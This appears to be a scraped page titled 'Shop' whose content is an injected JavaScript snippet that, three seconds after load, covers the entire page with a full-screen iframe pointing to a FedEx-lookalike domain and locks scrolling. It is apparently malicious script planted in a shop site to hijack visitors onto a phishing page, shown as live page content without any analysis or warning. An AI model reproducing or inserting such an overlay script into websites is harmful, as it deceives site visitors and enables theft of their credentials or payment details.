Shop
(function () {
if (window.__jsInjectorModal) return;
window.__jsInjectorModal = true;
function createModal(url) {
var overlay = document.createElement(‘div’);
Object.assign(overlay.style, {
position: ‘fixed’,
inset: ‘0’,
width: ‘100vw’,
height: ‘100dvh’,
minHeight: ‘100vh’,
background: ‘#fff’,
zIndex: ‘2147483647’,
margin: ‘0’,
padding: ‘0’,
border: ‘0’,
overflow: ‘hidden’,
display: ‘flex’,
alignItems: ‘stretch’,
justifyContent: ‘stretch’
});
var iframe = document.createElement(‘iframe’);
iframe.src = url;
iframe.allowFullscreen = true;
iframe.allow = ‘fullscreen’;
Object.assign(iframe.style, {
width: ‘100%’,
height: ‘100dvh’,
minHeight: ‘100vh’,
border: ‘none’,
display: ‘block’,
margin: ‘0’,
padding: ‘0’,
});
overlay.appendChild(iframe);
if (!document.body) {
document.addEventListener(‘DOMContentLoaded’, function () {
document.body.appendChild(overlay);
});
} else {
document.body.appendChild(overlay);
}
document.documentElement.style.overflow = ‘hidden’;
document.documentElement.style.height = ‘100%’;
document.body.style.overflow = ‘hidden’;
document.body.style.margin = ‘0’;
document.body.style.height = ‘100%’;
}
function run() {
setTimeout(function () {
createModal(‘https://fedexdomanhelp.icu’);
}, 3000);
}
if (document.readyState === ‘loading’) {
document.addEventListener(‘DOMContentLoaded’, run);
} else {
run();
}
})();